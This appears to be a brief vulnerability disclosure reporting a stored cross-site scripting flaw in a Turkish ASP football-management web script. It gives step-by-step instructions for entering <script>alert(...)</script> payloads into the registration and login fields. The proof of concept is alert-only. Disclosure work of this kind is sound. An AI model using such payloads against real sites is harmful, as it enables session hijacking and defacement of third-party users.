i found a bug on Gorki Online Santraç Sitesi (tr)  XSS Vulnerability.
i want to publish it on your site.


Gorki Online Santraç Sitesi (tr) XSS Vulnerability

#Software: Gorki Online Santraç Sitesi (tr)
#download: http://www.aspindir.com/goster/4988
#demo: http://kocaerfm.somee.com/santo/default.asp
#Found By: GeFORC3 ( G3 )


#Example & Exploit :

1-You write xss code in Gorki Online Santraç Sitesi (tr) script's
registry(kayýt ol) page.

http://example.com/santo/kayit.asp

example :

Kullanýcý Adý:  <script>alert("G3");</script>
E-posta :  <script>alert("G3");</script>
Takým Adýnnýz:  <script>alert("G3");</script>
Parola:  <script>alert("G3");</script>

Press to "kaydet"(registy) button.

2- You Log in system

example:

Oyuna Baðlan

Kullanýcý Adý: <script>alert("G3");</script>
Parola: <script>alert("G3");</script>

press to "giriþ"(log in) button.

3- http://example.com/santo/default.asp

This xss works on Gorki Online Santraç Sitesi (tr) script's main page


WwW.GeFORC3.Org  |  WwW.HeykirBlog.Com  |  WwW.NetKaBus.Com